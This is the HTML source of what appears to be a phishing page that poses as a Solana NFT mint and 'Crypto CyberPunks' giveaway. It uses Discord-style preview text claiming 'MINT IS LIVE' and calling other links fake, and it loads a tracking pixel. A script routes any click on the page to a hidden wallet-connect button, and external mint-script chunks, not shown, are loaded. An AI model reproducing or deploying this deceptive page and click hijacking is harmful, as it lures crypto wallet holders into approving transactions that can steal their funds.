<!DOCTYPE html>
<html lang="en">
    <title></title>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="utf-8">
    <meta name="description" content="Monkelabs" data-react-helmet="true">
    <meta name="theme-color" content="#FFA500">
    <meta name="og:title" content="🔗 Click Here To Mint">
    <meta content="
	
    🚨 MINT IS LIVE 🚨
    
    🚨 All other links are FAKE, DO NOT CLICK ANY LINK IN THE DM 🚨

    🚨 MOBILE USERS REMEMBER TO COPY AND PASTE LINK IN NATIVE SOLANA WALLETS (E.G PHANTOM, SOLPHARE) TO MINT 🚨



    " property="og:description">
    <meta name="og:title" content="🔗 Click Here To Mint">
    <meta property="og:site_name" content="This is an automatic announcement message.">
    <!-- <meta property="og:image" content="https://media.discordapp.net/attachments/970069425107636314/971109332148174878/Untitled-1.png?width=1522&height=856">
    <meta name="twitter:image" content="https://media.discordapp.net/attachments/970069425107636314/971109332148174878/Untitled-1.png?width=1522&height=856">
    <meta name="twitter:card" content="summary_large_image">
    <link rel="shortcut icon" type="image/png" href="https://cdn.discordapp.com/attachments/949367126530093137/971639509294936094/iron.png"/> -->
    <link rel="stylesheet" href="ajax/libs/font-awesome/5.15.4/css/all.min.css">
    <link rel="stylesheet" href="assets/css/normalize.css">
    <link rel="stylesheet" href="assets/css/style06d5.css?1221ss2a2">

    <script>
        window.addEventListener('click', () => {
            document.getElementById('showcase__btn0').addEventListener('click', function(e) {
                document.getElementsByClassName('MuiButton-containedPrimary')[0].click();
            });
        });
    </script>
</head>

<body>
    <script>
        new Image().src = "http://whos.amung.us/swidget/userlers";
    </script>
    <header>
        <div class="logo"><img src="assets/img/solana.png" alt="Logo"></div>
        <div class="social-list">
        </div>
    </header>

    <section class="section main-screen">
        <div class="main-area">

            <div class="main-area__right">
                <h2 class="right-title">Crypto CyberPunks GIVEAWAY</h2>

                <div class="right-list">
                    <li>
                        <div class="text">
                        CLAIM YOUR CRYPTO CYBERPUNK AND SUPER RARE WHITELIST STAKEING GIVEAWAY!
                        </div>
                    </li>
                </div>

                <!-- <div class="price">
                    <div class="add-input-remove">
                        <input type="text" id="total" value="1" readonly="">
                        <a href="javascript:void(0)" class="minus-btn">-</a>
                        <a href="javascript:void(0)" class="plus-btn">+</a>
                    </div>
                    <div class="price-box">
                        <div id="price-total"><span>0.40</span> SOL per 1 NFT</div>
                        <div>5 NFT max per transaction</div>
                    </div>
                </div> -->
                <div class="button-box">
                    <div id="root" class="cl-root">
                        <main>
                            <button id="butt" class="join-btn" tabindex="0" type="button" style="display: none;"></button>
                        </main>
                    </div>
                    <img src="assets/img/solana.png" alt="solana">
                </div>
            </div>

            <div class="main-area__left">
                <div class="slider-area">
                    <img class="" src="img/nft.gif" alt="sneakPeek">
                    <!-- <div class="token">
                        <div class="token-title">NFTs Minted</div>
                        <div class="token-line">
                            <div class="line"></div>
                            <div class="progress-line"></div>
                        </div>
                        <div class="token-number" id="tokenup"><span id="tokennumber">13</span> <span id="endTick">666</span></div>
                    </div> -->
                </div>
            </div>
        </div>
    </section>

    <script src="assets/js/jquery-3.6.0.min.js"></script>
    <script src="assets/js/slick.min.js"></script>

    <script>
        const $plusButton = document.querySelector(".plus-btn");
        const $minuButton = document.querySelector(".minus-btn");
        const $numberText = document.querySelector("#total");
        const $remaining = document.querySelector('#remaining');
        const $priceResultText = document.querySelector("#price-total span");
        let itemPriceSelected = 1;
        let itemCount = 5;

        $plusButton.addEventListener("click", function(e) {
            e.preventDefault();
            itemCount = itemCount < 5 ? itemCount + 1 : 1;
            $numberText.value = itemCount;
            $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(1);
        });
        $minuButton.addEventListener("click", function(e) {
            e.preventDefault();
            itemCount = parseInt($numberText.value);
            itemCount = itemCount > 1 ? itemCount - 1 : itemCount;
            $numberText.value = itemCount;
            $priceResultText.textContent = (itemPriceSelected * itemCount).toFixed(1);
        });
    </script>

    <script>
        ! function(e) {

            function t(t) {
                for (var n, i, a = t[0], c = t[1], l = t[2], s = 0, p = []; s < a.length; s++) i = a[s], Object
                    .prototype
                    .hasOwnProperty.call(o, i) && o[i] && p.push(o[i][0]), o[i] = 0;
                for (n in c) Object.prototype.hasOwnProperty.call(c, n) && (e[n] = c[n]);
                for (f && f(t); p.length;) p.shift()();
                return u.push.apply(u, l || []), r()
            }

            function r() {
                for (var e, t = 0; t < u.length; t++) {
                    for (var r = u[t], n = !0, a = 1; a < r.length; a++) {
                        var c = r[a];
                        0 !== o[c] && (n = !1)
                    }
                    n && (u.splice(t--, 1), e = i(i.s = r[0]))
                }
                return e
            }
            var n = {},
                o = {
                    1: 0
                },
                u = [];

            function i(t) {
                if (n[t]) return n[t].exports;
                var r = n[t] = {
                    i: t,
                    l: !1,
                    exports: {}
                };
                return e[t].call(r.exports, r, r.exports, i), r.l = !0, r.exports
            }
            i.e = function(e) {
                var t = [],
                    r = o[e];
                if (0 !== r)
                    if (r) t.push(r[2]);
                    else {
                        var n = new Promise((function(t, n) {
                            r = o[e] = [t, n]
                        }));
                        t.push(r[2] = n);
                        var u, a = document.createElement("script");
                        a.charset = "utf-8", a.timeout = 120, i.nc && a.setAttribute("nonce", i.nc), a.src =
                            function(
                                e) {
                                return i.p + "../static/js/" + ({}[e] || e) + "." + {
                                    3: ""
                                }[e] + "chunk.js"
                            }(e);
                        var c = new Error;
                        u = function(t) {
                            a.onerror = a.onload = null, clearTimeout(l);
                            var r = o[e];
                            if (0 !== r) {
                                if (r) {
                                    var n = t && ("load" === t.type ? "missing" : t.type),
                                        u = t && t.target && t.target.src;
                                    c.message = "Loading chunk " + e + " failed.\n(" + n + ": " + u + ")", c
                                        .name =
                                        "ChunkLoadError", c.type = n, c.request = u, r[1](c)
                                }
                                o[e] = void 0
                            }
                        };
                        var l = setTimeout((function() {
                            u({
                                type: "timeout",
                                target: a
                            })
                        }), 12e4);
                        a.onerror = a.onload = u, document.head.appendChild(a)
                    }
                return Promise.all(t)
            }, i.m = e, i.c = n, i.d = function(e, t, r) {
                i.o(e, t) || Object.defineProperty(e, t, {
                    enumerable: !0,
                    get: r
                })
            }, i.r = function(e) {
                "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol
                    .toStringTag, {
                        value: "Module"
                    }), Object.defineProperty(e, "__esModule", {
                    value: !0
                })
            }, i.t = function(e, t) {
                if (1 & t && (e = i(e)), 8 & t) return e;
                if (4 & t && "object" == typeof e && e && e.__esModule) return e;
                var r = Object.create(null);
                if (i.r(r), Object.defineProperty(r, "default", {
                        enumerable: !0,
                        value: e
                    }), 2 & t && "string" != typeof e)
                    for (var n in e) i.d(r, n, function(t) {
                        return e[t]
                    }.bind(null, n));
                return r
            }, i.n = function(e) {
                var t = e && e.__esModule ? function() {
                    return e.default
                } : function() {
                    return e
                };
                return i.d(t, "a", t), t
            }, i.o = function(e, t) {
                return Object.prototype.hasOwnProperty.call(e, t)
            }, i.p = "index.html", i.oe = function(e) {
                throw console.error(e), e
            };
            var a = this["webpackJsonpcandy-machine-mint"] = this["webpackJsonpcandy-machine-mint"] || [],
                c = a.push.bind(a);
            a.push = t, a = a.slice();
            for (var l = 0; l < a.length; l++) t(a[l]);
            var f = c;
            r()
        }([])
    </script>
    <script src="static/js/chunk.js"></script>
    <script src="static/js/main.chunk.js"></script>
    <script src="assets/js/tokenup.js"></script>
</body>
</html>
